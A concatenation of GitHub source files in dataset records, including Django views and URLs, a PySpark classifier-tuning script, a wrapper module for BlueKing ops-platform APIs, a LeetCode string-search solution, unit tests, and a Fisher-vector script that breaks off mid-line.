avl_rq, created = UpdateRequest.objects.get_or_create(\n user=self.object)\n avl_rq.requested_by.add(self.request.user)\n avl_rq.save()\n RequestUpdateEmail(\n user=self.object,\n requested_by=request.user\n ).send()\n return self.render_to_response(self.get_context_data())\nrequest_update = member_required(RequestUpdateView.as_view())\n\n\nclass BatchRequestUpdateView(TemplateView):\n template_name = 'availability/partials/batch_update_request_form.html'\n\n def get_context_data(self, extra_context=None):\n extra_context = extra_context or {}\n ctx = super(BatchRequestUpdateView, self).get_context_data()\n ctx.update({\n 'success': True,\n })\n ctx.update(extra_context)\n return ctx\n\n def post(self, request):\n form = BatchRequestUpdateForm(data=request.POST)\n if form.is_valid():\n for user in form.cleaned_data['users']:\n avl_rq, created = UpdateRequest.objects.get_or_create(\n user=user)\n avl_rq.requested_by.add(self.request.user)\n avl_rq.save()\n RequestUpdateEmail(\n user=user,\n requested_by=request.user\n ).send()\n return self.render_to_response(\n self.get_context_data({'success': True}))\n else:\n return self.render_to_response(\n self.get_context_data({'success': False, 'form_error': True}))\nbatch_request_update = member_required(BatchRequestUpdateView.as_view())\n\n\nclass ConfirmAvailability(TemplateView):\n template_name = 'availability/confirm.html'\n confirmed = False\n\n def get(self, request):\n confirmed = request.GET.get('confirm', '').strip().lower()\n self.confirmed = confirmed == 'yes'\n if self.confirmed:\n request.user.last_updated_availability = now()\n request.user.save(update_fields=(('meta'),))\n return super(ConfirmAvailability, self).get(request)\n\n def get_context_data(self):\n ctx = super(ConfirmAvailability, self).get_context_data()\n ctx['availability'] = self.request.user.get_availability()\n ctx['object'] = self.request.user\n return ctx\nconfirm_availability = login_required(ConfirmAvailability.as_view())\n","repo_name":"ExpoPythonist/ProveBanking__s","sub_path":"apps/availability/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3539,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"30041012594","text":"# -*- coding: utf-8 -*-\n# Autor: Fernando Roldán Zafra\n# Clasificación con spark\nfrom __future__ import print_function\nfrom pyspark import SparkContext, SparkConf, SQLContext\nfrom pyspark.sql.types import StructType, StructField, FloatType, IntegerType, StringType\nfrom pyspark.ml.feature import VectorAssembler, StandardScaler\nfrom pyspark.ml import Pipeline\nfrom pyspark.ml.feature import StringIndexer\nfrom pyspark.ml.tuning import ParamGridBuilder, TrainValidationSplit\nfrom pyspark.ml.evaluation import BinaryClassificationEvaluator\nfrom pyspark.ml.classification import LogisticRegression, RandomForestClassifier, LinearSVC\n\n#Creation of the spark context\ndef init_Context():\n\tconf = SparkConf().setAppName(\"Practica 4 - Fernando Roldan\")\n\tsc = SparkContext(conf=conf)\n\t#Do not show warnings on logs\n\tsc.setLogLevel('ERROR')\n\treturn sc\n\ndef read_csv(sc):\n\tsql = SQLContext(sc)\n\tdf = sql.read.csv(\"./filteredC.small.training\", header=True, inferSchema=True)\n\treturn df\n\ndef preprocess(df):\n\tdf = under_sampling(df)\n\tindexer = StringIndexer(inputCol=\"PredSS_central_1\", outputCol=\"PredSS_central_1_indexed\")\n\n\tassembler = VectorAssembler(inputCols=[\"PSSM_r1_1_N\", \"PredSS_central_1_indexed\", \"AA_freq_central_A\", \n\t\t\"AA_freq_global_H\", \"PSSM_r1_1_S\", \"PSSM_r2_-3_Y\"], outputCol='features')\n\t\n\tpipeline = Pipeline(stages=[indexer, assembler])\n\tdf_1 = pipeline.fit(df).transform(df).select('features', 'class')\n\t#df = assembler.transform(df).select('features', 'class')\n\t#df = df.select('features', 'labels')\n\tscale = StandardScaler(withMean=True, withStd=True, inputCol='features', outputCol='scaled_features')\n\tscale = scale.fit(df_1)\n\tdf_1 = scale.transform(df_1)\n\treturn df_1\n\n\ndef under_sampling(df):\n\tdf1 = df.filter(\"class=0\")\n\tdf2 = df.filter(\"class=1\")\n\tratio = float(df2.count())/float(df1.count())\n\tsample = df1.sample(withReplacement=False, fraction=ratio, seed=27)\n\tdf = sample.union(df2)\n\treturn df\n\n\ndef tuning(classifier, paramGrid, train):\n\ttvs = TrainValidationSplit(estimator=classifier,\n\t\t\t\t\t\t estimatorParamMaps=paramGrid,\n\t\t\t\t\t\t evaluator=BinaryClassificationEvaluator(),\n\t\t\t\t\t\t # 80% of the data will be used for training, 20% for validation.\n\t\t\t\t\t\t trainRatio=0.8)\n\n\t# Run TrainValidationSplit, and choose the best set of parameters.\n\tmodel = tvs.fit(train)\n\n\tParamMaps = model.getEstimatorParamMaps()\n\tfor i, params in enumerate(ParamMaps):\n\t\tprint(\"---------_\", str(i), \"_---------\", \" AUC: \", str(model.validationMetrics[i]))\n\t\tfor param, value in params.items():\n\t\t\tprint(param.name, \": \", str(value), \"; \", end='')\n\t\tprint(\"\\n\")\n\n\treturn model.bestModel\n\n\ndef validate(model, test):\n\t#model = estimator.fit(train)\n\teval = BinaryClassificationEvaluator()\n\tscore = eval.evaluate(model.transform(test))\n\treturn score\n\ndef train_logistic_regresion(train, test):\n\tlr = LogisticRegression(labelCol=\"class\", featuresCol=\"scaled_features\")\n\t\n\tparamGrid = ParamGridBuilder() \\\n\t.addGrid(lr.maxIter, [5, 10, 20]) \\\n\t.addGrid(lr.regParam, [0.1, 0.01]) \\\n\t.addGrid(lr.elasticNetParam, [0.5, 1]) \\\n\t.build()\n\n\tbest_model = tuning(lr, paramGrid, train)\n\tAUC = validate(best_model, test)\n\tprint(\"LogisticRegression best model AUC\", AUC)\n\tbest_model.write().overwrite().save(\"./logisticRegression_model\")\n\ndef train_random_forest(train, test):\n\trf = RandomForestClassifier(labelCol=\"class\", featuresCol=\"scaled_features\")\n\tparamGrid = ParamGridBuilder() \\\n\t.addGrid(rf.numTrees, [5, 10, 15]) \\\n\t.addGrid(rf.maxDepth, [3, 5, 8]) \\\n\t.build()\n\t\n\tbest_model = tuning(rf, paramGrid, train)\n\tAUC = validate(best_model, test)\n\tprint(\"Random forest best model AUC\", AUC)\n\tbest_model.write().overwrite().save(\"./random_forest_model\")\n\n\ndef train_linearSVC(train, test):\n\tsvc = LinearSVC(labelCol=\"class\", featuresCol=\"scaled_features\")\n\t\n\tparamGrid = ParamGridBuilder() \\\n\t.addGrid(svc.maxIter, [3, 5, 8]) \\\n\t.addGrid(svc.regParam, [0.1, 0.05, 0.15]) \\\n\t.build()\n\n\tbest_model = tuning(svc, paramGrid, train)\n\tAUC = validate(best_model, test)\n\tprint(\"Linear SVC best model AUC\", AUC)\n\tbest_model.write().overwrite().save(\"./svc_model\") \t\n\t\nif __name__==\"__main__\":\n\tsc = init_Context()\n\tdf = read_csv(sc)\n\tdf = preprocess(df)\n\tdf = df.selectExpr(\"scaled_features\",\"class as label\", \"class\")\n\ttrain, test = df.randomSplit([0.8, 0.2], seed=27) \n\n\tprint(\"Starting logistic Regression train...\")\n\ttrain_logistic_regresion(train, test)\n\t\n\t#print(\"Starting Random Forest train...\")\n\t#train_random_forest(train, test)\n\n\t#print(\"Starting linear SVC train...\")\n\t#train_linearSVC(train, test)\n\tsc.stop()\n","repo_name":"FernandoRoldan93/MII_Spark","sub_path":"src/script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":4510,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"74670522792","text":"from django.urls import path\nfrom . import views\nfrom django.conf import settings\nfrom django.conf.urls.static import static\n\nurlpatterns = [\n path('', views.say_hello),\n path('upload/', views.upload),\n path('labels/', views.labels),\n path('library/', views.get_all_videos),\n path('search/', views.search),\n path('recom/', views.recommendations),\n path('delete/', views.delete_videos),\n]\n\nif settings.DEBUG:\n urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n","repo_name":"irusha/cs50fp","sub_path":"homehub/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":510,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41789345493","text":"# coding: utf-8\n# @Time: 2019/10/16 17:01\n# @Author: renpingsheng\n\nimport base64\n\nfrom blueking.component.shortcuts import get_client_by_request, get_client_by_user\n\n\n################### 蓝鲸登录平台 #######################\n\n# 获取所有用户信息\ndef bk_login_get_all_users(request):\n client = get_client_by_request(request)\n res = client.bk_login.get_all_users()\n if res.get('code') == 0:\n return res.get('data')\n\n\n# 批量获取用户信息\ndef bk_login_get_batch_users(request, user_list):\n client = get_client_by_request(request)\n params = {\"bk_username_list\": user_list}\n res = client.bk_login.get_batch_users(**params)\n if res.get('code') == 0:\n return res.get('data')\n\n\n# 获取用户信息\ndef bk_login_get_user(request):\n client = get_client_by_request(request)\n res = client.bk_login.get_user()\n if res.get('code') == 0:\n return res.get('data')\n\n\n################### 蓝鲸开发者中心 #######################\n\n# 获取应用信息\ndef bk_paas_get_app_info(request):\n client = get_client_by_request(request)\n res = client.bk_paas.get_app_info()\n if res.get('code') == 0:\n return res.get('data')\n\n\n################### 蓝鲸开发者平台 #######################\n\n# 发送邮件\ndef cmsi_send_mail(request):\n client = get_client_by_request(request)\n params = {\n 'bk_username': 'admin',\n \"receiver__username\": \"szgd_renpingsheng\",\n \"title\": \"This is a Test\",\n \"content\": \"Welcome to Blueking\",\n }\n res = client.cmsi.send_mail(**params)\n if res.get('result') == 0:\n return True\n return False\n\n\n# 发送邮件\ndef cmsi_send_sms(request):\n client = get_client_by_request(request)\n params = {\n 'bk_username': 'admin',\n \"receiver__username\": \"szgd_renpingsheng\",\n \"content\": \"Welcome to Blueking\",\n }\n res = client.cmsi.send_sms(**params)\n if res.get('result') == 0:\n return True\n return False\n\n\n################### 蓝鲸管控平台 #######################\n\n# 查询agent心跳详细信息。数据非实时,延时1分钟内。\ndef gse_get_agent_info(request):\n client = get_client_by_request(request)\n params = {\n \"bk_supplier_account\": \"0\",\n \"hosts\": [\n {\n \"ip\": \"192.168.148.103\",\n \"bk_cloud_id\": 0\n }\n ]\n }\n res = client.gse.get_agent_info(**params)\n if res.get('code') == 0:\n return res.get('data')\n return res[\"message\"]\n\n\n# 查询agent实时在线状态\ndef gse_get_agent_status(request):\n client = get_client_by_request(request)\n params = {\n \"bk_supplier_account\": \"0\",\n \"hosts\": [\n {\n \"ip\": \"192.168.148.114\",\n \"bk_cloud_id\": 0\n }\n ]\n }\n res = client.gse.get_agent_status(**params)\n if res.get('code') == 0:\n return res.get('data')\n return res[\"message\"]\n\n\n################### 蓝鲸作业平台 #######################\n\n# 获取所有作业\ndef job_get_job_list(request):\n client = get_client_by_request(request)\n params = {\n \"bk_biz_id\": 2, # 业务ID\n # \"name\": \"更新\", # 作业名称,模糊匹配\n # \"creator\": \"szgd_gavinlin\", # 作业创建人帐号\n # \"create_time_start\": \"2019-01-16\", # 创建起始时间,YYYY-MM-DD格式\n # \"create_time_end\": \"2019-01-16\", # 创建结束时间,YYYY-MM-DD格式\n # \"last_modify_user\": \"v_leehe\", # 作业修改人帐号\n # \"last_modify_time_start\": \"2019-01-17\", # 最后修改起始时间,YYYY-MM-DD格式\n # \"last_modify_time_end\": \"2019-01-17\", # 最后修改结束时间,YYYY-MM-DD格式\n # \"tag_id\": \"1\", # 作业标签ID,1.未分类、2.运营发布、3.故障处理、4.常用工具、5.产品自助、6.测试专用、7.持续集成\n # \"start\": \"1\", # 默认0表示从第1条记录开始返回\n # \"length\": \"1\", # 返回记录数量,不传此参数默认返回全部\n }\n res = client.job.get_job_list(**params)\n\n if res.get('code') == 0:\n return res.get('data')\n\n\n# 根据作业模板ID查询作业模板详情,测试OK\ndef job_get_job_detail(request):\n client = get_client_by_request(request)\n params = {\n \"bk_biz_id\": 2,\n \"bk_job_id\": 1135, # 通过 job_get_job_list 接口查询\n }\n res = client.job.get_job_detail(**params)\n if res.get('code') == 0:\n return res.get('data')\n\n\n# 根据作业模板ID查询作业模板详情,测试OK\ndef job_get_cron_list(request):\n client = get_client_by_request(request)\n params = {\n \"bk_biz_id\": 2,\n # \"cron_name\": \"cron_name\", # 定时作业名称\n # \"cron_id\": \"cron_name\", # 定时任务ID,如果存在则忽略其他筛选条件,只查询这个指定的作业信息\n # \"cron_status\": \"cron_name\", # 定时作业状态:1.已启动、2.已暂停\n # \"creator\": \"cron_name\", # 定时作业创建人帐号\n # \"create_time_start\": \"cron_name\", # 创建起始时间,YYYY-MM-DD格式\n # \"create_time_end\": \"cron_name\", # 创建结束时间,YYYY-MM-DD格式\n # \"last_modify_user\": \"cron_name\", # 作业修改人帐号\n # \"last_modify_time_start\": \"cron_name\", # 最后修改起始时间,YYYY-MM-DD格式\n # \"last_modify_time_end\": \"cron_name\", # 最后修改结束时间,YYYY-MM-DD格式\n # \"start\": \"cron_name\", # 默认0表示从第1条记录开始返回\n # \"length\": \"cron_name\", # 返回记录数量,不传此参数默认返回全部\n }\n res = client.job.get_cron_list(**params)\n if res.get('code') == 0:\n return res.get('data')\n return res[\"message\"]\n\n\n# 快速分发文件,测试OK\ndef job_fast_push_file(request):\n client = get_client_by_request(request)\n params = {\n \"bk_biz_id\": 2, # 业务ID\n \"account\": \"root\", # 执行帐号名/别名\n \"file_target_path\": \"/tmp\", # 分发文件的目标路径\n \"file_source\": [\n {\n \"files\": [\n \"/root/test_push_file.txt\" # 源目标主机的源文件路径\n ],\n \"account\": \"root\",\n \"ip_list\": [\n {\n \"bk_cloud_id\": 0,\n \"ip\": \"192.168.148.103\" # 源目标主机\n },\n ],\n # \"custom_query_id\": [\n # \"3\"\n # ]\n }\n ],\n \"ip_list\": [\n {\n \"bk_cloud_id\": 0,\n \"ip\": \"192.168.148.104\" # 目标主机\n },\n ],\n }\n res = client.job.fast_push_file(**params)\n\n if res.get('code') == 0:\n return True\n\n\n# 快速执行脚本\ndef job_fast_execute_script(request):\n \"\"\"\n 快速执行脚本\n :param request:\n :return:\n \"\"\"\n bk_cloud_id = 0\n ip = \"192.168.148.103\"\n biz_id = 2\n ip_list = [{\n \"bk_cloud_id\": bk_cloud_id,\n \"ip\": ip\n }]\n client = get_client_by_request(request)\n content = \"\"\"\n #!/bin/bash\n cat /proc/loadavg\n \"\"\" # 脚本内容\n params = {\n 'bk_username': 'admin',\n 'bk_biz_id': int(biz_id),\n 'script_content': base64.b64encode(content),\n 'account': \"root\",\n 'bk_callback_url': \"root\",\n 'script_type': 1,\n 'ip_list': ip_list,\n } # 参数\n resp = client.job.fast_execute_script(**params)\n\n if resp.get('code') == 0:\n return resp[\"data\"]\n\n\n# 获取脚本执行状态,判断脚本是否已经执行完成\ndef job_get_job_instance_status(request):\n global count\n count += 1\n client = get_client_by_request(request)\n # 查询执行状态\n resp = client.job.get_job_instance_status(\n bk_username='admin',\n bk_biz_id=2,\n job_instance_id=3667430\n )\n if resp.get('data', {}).get('is_finished'):\n count = 0\n return True\n\n\n# 获取脚本执行结果\ndef job_get_job_instance_log(request):\n client = get_client_by_request(request)\n # 查询日志\n resp = client.job.get_job_instance_log(\n job_instance_id=3667430,\n bk_biz_id=2,\n bk_username='admin'\n )\n ip_logs = resp.get(\"data\")[0].get('step_results')[0].get(\"ip_logs\")\n return ip_logs\n\n\n# 启动作业\ndef job_execute_job(request):\n client = get_client_by_request(request)\n params = {\n \"bk_biz_id\": 2,\n \"bk_job_id\": 1,\n }\n res = client.job.execute_job(**params)\n if res.get('code') == 0:\n return res.get('data')\n return res[\"message\"]\n\n\n# 快速执行SQL脚本\ndef job_fast_execute_sql(request):\n client = get_client_by_request(request)\n params = {\n \"bk_biz_id\": 2,\n \"script_id\": 1,\n \"script_content\": base64.b64encode(\"show databases\"),\n \"script_timeout\": 1000,\n \"db_account_id\": 32,\n \"ip_list\": [\n {\n \"bk_cloud_id\": 0,\n \"ip\": \"192.168.102.152\"\n },\n {\n \"bk_cloud_id\": 0,\n \"ip\": \"192.168.102.151\"\n }\n ]\n }\n res = client.job.fast_execute_sql(**params)\n if res.get('code') == 0:\n return res.get('data')\n return res[\"message\"]\n\n\n# 查询用户有权限的DB帐号列表\ndef job_get_own_db_account_list(request):\n client = get_client_by_request(request)\n params = {\n \"bk_username\": \"admin\",\n \"bk_biz_id\": 2, # 业务ID\n }\n res = client.job.get_own_db_account_list(**params)\n if res.get('code') == 0:\n return res.get('data')\n\n\n# 更新定时作业状态\ndef job_update_cron_status(request):\n client = get_client_by_request(request)\n params = {\n \"bk_biz_id\": 2,\n \"cron_status\": 1, # 1.启动、2.暂停\n \"cron_id\": 2\n }\n res = client.job.update_cron_status(**params)\n if res.get('code') == 0:\n return res.get('data')\n return res[\"message\"]\n\n\n# 新建或保存定时作业\ndef job_save_cron(request):\n client = get_client_by_request(request)\n params = {\n 'bk_username': 'admin',\n \"bk_biz_id\": 1,\n \"bk_job_id\": 100,\n \"cron_name\": \"test\",\n \"cron_expression\": \"0 0/5 * * * ?\"\n }\n res = client.job.save_cron(**params)\n if res.get('code') == 0:\n return res.get('data')\n return res[\"message\"]\n\n\n# 更新定时作业状态\ndef job_change_cron_status(request):\n client = get_client_by_request(request)\n params = {\n \"bk_biz_id\": 2,\n \"cron_status\": 1, # 1.启动、2.暂停\n \"cron_id\": 1\n }\n res = client.job.update_cron_status(**params)\n if res.get('code') == 0:\n return res.get('data')\n return res[\"message\"]\n\n\n################### 蓝鲸配置平台 #######################\n\n\n# 获取所有业务,测试OK\ndef cc_search_business(request, fields=[]):\n \"\"\"\n 获取业务列表\n :param request:\n :return:\n \"\"\"\n client = get_client_by_request(request)\n params = {'fields': fields}\n res = client.cc.search_business(**params)\n if res.get('code') == 0:\n return res.get('data', {}).get('info', [])\n\n\n# 根据业务ID查询集群,测试OK\ndef cc_search_set(request):\n client = get_client_by_request(request)\n params = {\n 'bk_biz_id': 2,\n \"fields\": [\"bk_set_id\", \"bk_set_name\"]\n }\n res = client.cc.search_set(**params)\n if res.get('code') == 0:\n return res.get('data', '').get('info', [])\n\n\n# 根据条件查询主机,测试OK\ndef cc_search_host(request):\n client = get_client_by_request(request)\n params = {\n \"condition\": [\n {\"bk_obj_id\": \"set\", \"fields\": [], \"condition\": []},\n {\"bk_obj_id\": \"host\", \"fields\": [], \"condition\": []},\n {\"bk_obj_id\": \"module\", \"fields\": [], \"condition\": []},\n {\"bk_obj_id\": \"biz\", \"fields\": [], \"condition\": []},\n {\"bk_obj_id\": \"object\", \"fields\": [], \"condition\": []}\n ]\n }\n res = client.cc.search_host(**params) # 根据业务ID和集群ID查询主机\n if res.get('code') == 0:\n return res.get('data', '').get('info', [])\n\n\n# 获取主机详情\ndef cc_get_host_base_info(request):\n client = get_client_by_request(request)\n params = {\"bk_host_id\": 224}\n res = client.cc.get_host_base_info(**params)\n if res.get('code') == 0:\n return res.get('data', [])\n\n\n# 查询业务实例拓扑,测试OK\ndef cc_search_biz_inst_topo(request, bk_biz_id):\n client = get_client_by_request(request)\n params = {\"bk_biz_id\": bk_biz_id}\n res = client.cc.search_biz_inst_topo(**params)\n if res.get('code') == 0:\n return res.get('data')\n\n\n# 查询实例\ndef cc_search_inst_by_object(request):\n client = get_client_by_request(request)\n params = {\n \"bk_supplier_account\": \"0\",\n \"bk_obj_id\": \"biz\",\n \"page\": {\n \"start\": 0,\n \"limit\": 50,\n \"sort\": \"bk_inst_id\"\n },\n \"fields\": [],\n \"condition\": {}\n }\n res = client.cc.search_inst_by_object(**params)\n if res.get('code') == 0:\n return res.get('data')\n\n\n# 查询模块\ndef cc_search_module(request):\n client = get_client_by_request(request)\n params = {\n 'bk_biz_id': 2,\n 'bk_set_id': 2,\n \"bk_supplier_account\": \"0\",\n \"fields\": [],\n \"condition\": {},\n \"page\": {\n \"start\": 0,\n \"limit\": 10\n }\n }\n res = client.cc.search_module(**params)\n if res.get('code') == 0:\n return res.get('data')\n\n\n# 创建模块\ndef cc_create_module(request):\n client = get_client_by_request(request)\n params = {\n \"bk_supplier_account\": \"0\",\n \"bk_biz_id\": 1,\n \"bk_set_id\": 10,\n \"data\": {\n \"bk_parent_id\": 10,\n \"bk_module_name\": \"test\"\n }\n }\n res = client.cc.create_module(**params)\n if res.get('code') == 0:\n return res.get('data')\n return res[\"message\"]\n\n\n# 创建集群\ndef cc_create_set(request):\n client = get_client_by_request(request)\n params = {\n \"bk_supplier_account\": \"0\",\n \"bk_biz_id\": 2,\n \"data\": {\n \"bk_parent_id\": 1,\n \"bk_set_name\": \"test-set\",\n \"bk_set_desc\": \"test-set\",\n \"bk_capacity\": 1000,\n \"description\": \"description\"\n }\n }\n res = client.cc.create_set(**params)\n if res.get('code') == 0:\n return res.get('data')\n return res[\"message\"]\n\n\n# 删除业务\ndef cc_delete_business(request):\n client = get_client_by_request(request)\n params = {\n \"bk_supplier_account\": \"0\",\n \"bk_biz_id\": 2,\n }\n res = client.cc.delete_business(**params)\n if res.get('code') == 0:\n return res.get('data')\n return res[\"message\"]\n\n\n# 删除主机\ndef cc_delete_host(request):\n client = get_client_by_request(request)\n params = {\n \"bk_supplier_account\": \"0\",\n \"bk_host_id\": \"1,2,3\",\n }\n res = client.cc.delete_host(**params)\n if res.get('code') == 0:\n return res.get('data')\n return res[\"message\"]\n\n\n# 删除模块\ndef cc_delete_module(request):\n client = get_client_by_request(request)\n params = {\n \"bk_supplier_account\": \"0\",\n \"bk_biz_id\": 1,\n \"bk_set_id\": 1,\n \"bk_module_id\": 1\n }\n res = client.cc.delete_module(**params)\n if res.get('code') == 0:\n return res.get('data')\n return res[\"message\"]\n\n\n# 删除集群\ndef cc_delete_set(request):\n client = get_client_by_request(request)\n params = {\n \"bk_supplier_account\": \"0\",\n \"bk_biz_id\": 1,\n \"bk_set_id\": 1,\n }\n res = client.cc.delete_set(**params)\n if res.get('code') == 0:\n return res.get('data')\n return res[\"message\"]\n\n\n# 修改业务\ndef cc_update_business(request):\n client = get_client_by_request(request)\n params = {\n 'bk_biz_id': 2,\n \"data\": {\n \"bk_biz_name\": \"cc_app_test\",\n \"bk_biz_maintainer\": \"admin\",\n \"bk_biz_productor\": \"admin\",\n \"bk_biz_developer\": \"admin\",\n \"bk_biz_tester\": \"admin\",\n }\n }\n res = client.cc.update_business(**params)\n if res.get('code') == 0:\n return res.get('data')\n return res[\"message\"]\n\n\n# 更新主机属性\ndef cc_update_host(request):\n client = get_client_by_request(request)\n params = {\n 'bk_username': 'admin',\n \"bk_host_id\": \"1,2,3\",\n \"data\": {\n \"bk_host_name\": \"test\"\n }\n }\n res = client.cc.update_host(**params)\n if res.get('code') == 0:\n return res.get('data')\n return res[\"message\"]\n\n\n# 更新模块\ndef cc_update_module(request):\n client = get_client_by_request(request)\n params = {\n \"bk_supplier_account\": 0,\n \"bk_biz_id\": 1,\n \"bk_set_id\": 1,\n \"bk_module_id\": 1,\n \"data\": {\n \"bk_module_name\": \"test\"\n }\n }\n res = client.cc.update_module(**params)\n if res.get('code') == 0:\n return res.get('data')\n return res[\"message\"]\n\n\n# 更新集群\ndef cc_update_set(request):\n client = get_client_by_request(request)\n params = {\n \"bk_supplier_account\": \"0\",\n \"bk_biz_id\": 1,\n \"bk_set_id\": 1,\n \"data\": {\n \"bk_set_name\": \"test\"\n }\n }\n res = client.cc.update_set(**params)\n if res.get('code') == 0:\n return res.get('data')\n return res[\"message\"]\n","repo_name":"sususama5555/bk-framework","sub_path":"home_application/utils/bk_api_by_client.py","file_name":"bk_api_by_client.py","file_ext":"py","file_size_in_byte":17518,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"32654006055","text":"class Solution(object):\n def strStr(self, haystack, needle):\n \"\"\"\n :type haystack: str\n :type needle: str\n :rtype: int\n \"\"\"\n # 方法1\n # if needle not in haystack:\n # return -1\n # return haystack.find(needle)\n\n # 方法2\n\n l = len(needle)\n for i in range(len(haystack)-l):\n if haystack[i:i+l]==needle:\n return i\n return -1\n\nif __name__=='__main__':\n h = 'hello'\n n = 'll'\n print(Solution().strStr(h,n))","repo_name":"a752602882/Http_To_Do","sub_path":"leetcode/字符串/实现strStr().py","file_name":"实现strStr().py","file_ext":"py","file_size_in_byte":537,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"20195895226","text":"\nimport unittest\nfrom varapp.filters.sort import *\nfrom varapp.variants.variants_factory import variants_collection_factory\nfrom varapp.data_models.variants import VARIANT_FIELDS\nfrom django.test.client import RequestFactory\n\nclass TestSort(unittest.TestCase):\n def setUp(self):\n self.variants = variants_collection_factory(db='test')\n\n def test_sort_from_request_ASC(self):\n \"\"\"Should sort variants wrt. a specific column\n - string, int or float -, from smaller to bigger or in alphabetical order.\n Compare with manual sort.\n Frequencies could have None values, which is why we use this Sort.\n \"\"\"\n for field in ['chrom','start','aaf_1kg_all']:\n request = RequestFactory().get('', {'order_by': '{},ASC'.format(field)})\n order = sort_from_request(request)\n self.assertIsInstance(order, Sort)\n self.assertEqual(order.key, field)\n self.assertEqual(order.reverse, False)\n var = self.variants.order_by(order.key, order.reverse)\n col0 = [getattr(v,field) for v in self.variants]\n col = [getattr(v,field) for v in var]\n col0_nonull = [x for x in col0 if x is not None]\n col0 = [None]*(len(col)-len(col0_nonull)) + sorted(col0_nonull)\n self.assertEqual(col0, col)\n\n def test_sort_from_request_DESC(self):\n \"\"\"'DESC' should reverse the ordering.\n Except for Nones that are always less.\"\"\"\n for field in ['chrom','start','aaf_1kg_all']:\n request = RequestFactory().get('', {'order_by': '{},DESC'.format(field)})\n order = sort_from_request(request)\n self.assertEqual(order.reverse, True)\n var = self.variants.order_by(order.key, order.reverse)\n col0 = [getattr(v,field) for v in self.variants]\n col = [getattr(v,field) for v in var]\n col0_nonull = [x for x in col0 if x is not None]\n col0 = sorted(col0_nonull, reverse=True) + [None]*(len(col)-len(col0_nonull))\n self.assertEqual(col0, col)\n\n\nclass TestSortableFields(unittest.TestCase):\n \"\"\"Ultimately we want to be able to sort wrt. to all possible exported fields.\"\"\"\n #@unittest.skip('')\n def test_sort_all(self):\n \"\"\"Just check that it does not raise an error.\"\"\"\n var = variants_collection_factory(db='test')\n for field in VARIANT_FIELDS:\n Sort(field, False).sort(var)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"varapp/varapp-backend-py","sub_path":"tests/filters/test_sort.py","file_name":"test_sort.py","file_ext":"py","file_size_in_byte":2504,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"72"} +{"seq_id":"14823790379","text":"# Owner(s): [\"module: dynamo\"]\n\nimport torch\nimport torch._dynamo as torchdynamo\nfrom torch.testing._internal.common_utils import TestCase, run_tests, TEST_CUDA\nimport unittest\n\ntry:\n import tabulate # noqa: F401 # type: ignore[import]\n from torch.utils.benchmark.utils.compile import bench_all\n HAS_TABULATE = True\nexcept ImportError:\n HAS_TABULATE = False\n\n@unittest.skipIf(not TEST_CUDA, \"CUDA unavailable\")\n@unittest.skipIf(not HAS_TABULATE, \"tabulate not available\")\nclass TestCompileBenchmarkUtil(TestCase):\n def test_training_and_inference(self):\n class ToyModel(torch.nn.Module):\n def __init__(self):\n super().__init__()\n self.weight = torch.nn.Parameter(torch.Tensor(2, 2))\n\n def forward(self, x):\n return x * self.weight\n\n torchdynamo.reset()\n model = ToyModel().cuda()\n\n inference_table = bench_all(model, torch.ones(1024, 2, 2).cuda(), 5)\n self.assertTrue(\"Inference\" in inference_table and \"Eager\" in inference_table and \"-\" in inference_table)\n\n training_table = bench_all(model, torch.ones(1024, 2, 2).cuda(), 5, optimizer=torch.optim.SGD(model.parameters(), lr=0.01))\n self.assertTrue(\"Train\" in training_table and \"Eager\" in training_table and \"-\" in training_table)\n\nif __name__ == '__main__':\n run_tests()\n","repo_name":"pytorch/pytorch","sub_path":"test/test_compile_benchmark_util.py","file_name":"test_compile_benchmark_util.py","file_ext":"py","file_size_in_byte":1361,"program_lang":"python","lang":"en","doc_type":"code","stars":72779,"dataset":"github-code","pt":"72"} +{"seq_id":"39588368665","text":"import sys\nimport numpy as np\nimport numpy.linalg as LA\nimport scipy.linalg\nfrom sklearn.mixture import GaussianMixture\nfrom sklearn.preprocessing import normalize\nfrom sklearn.decomposition import PCA\nfrom sklearn.externals import joblib\nfrom multiprocessing.dummy import Pool as ThreadPool\nfrom yael import ynumpy\nimport time, h5py\n\ndef calculateFV(img):\n im_matrix_ = np.array(img)\n # k is the GMM dimension\n k = 256\n n_sample = im_matrix_.shape[0]\n\n # compute PCA and transform the samples\n pca_transform = myPCA(im_matrix_, k)\n im_matrix_ = pca_transform.transform(im_matrix_)\n\n # train GMM\n print(\"Start fitting GMM\")\n GMM_ = GaussianMixture(n_components=k, covariance_type='diag', verbose_interval=1)\n t1 = time.time()\n GMM_.fit(im_matrix_)\n print(\"GMM fit in {}\".format(time.time() - t1))\n\n # Get GMM matrices\n w_, mu_, sigma_ = GMM_.weights_, GMM_.means_, GMM_.covariances_\n\n # Convert to FP32 (from FP64)\n gmm = w_.astype('float32'), mu_.astype('float32'), sigma_.astype('float32')\n\n # compute FVS\n print(\"Processing FV of image i\")\n # compute the Fisher vector, using only the derivative w.r.t mu\n fv = ynumpy.fisher(gmm, im_matrix_, include='mu')\n print(\"FV processed.\")\n return fv\n\n\n# function to be mapped over\ndef calculateParallel(tensor, threads=16):\n pool = ThreadPool(threads)\n results = pool.map(calculateFV, tensor)\n pool.close()\n pool.join()\n return np.array(results)\n\ndef process():\n # make a big matrix with all image descriptors\n\n t = time.time()\n\n n_images = 256\n n_windows = 500\n\n all_desc = []\n\n h5f = h5py.File(\"feature_matrix_with_windows.h5\", 'r')\n for i in range(n_images):\n feats = normalize(h5f['feature_matrix_image_{}'.format(i)][:], axis=1, norm='l2')\n all_desc.append(feats)\n print(feats.shape)\n h5f.close()\n\n # ensure that the descriptors are FP32 and put them in a matrix\n image_descs = np.array(all_desc)\n\n\n print(image_descs.shape)\n\n image_fvs = 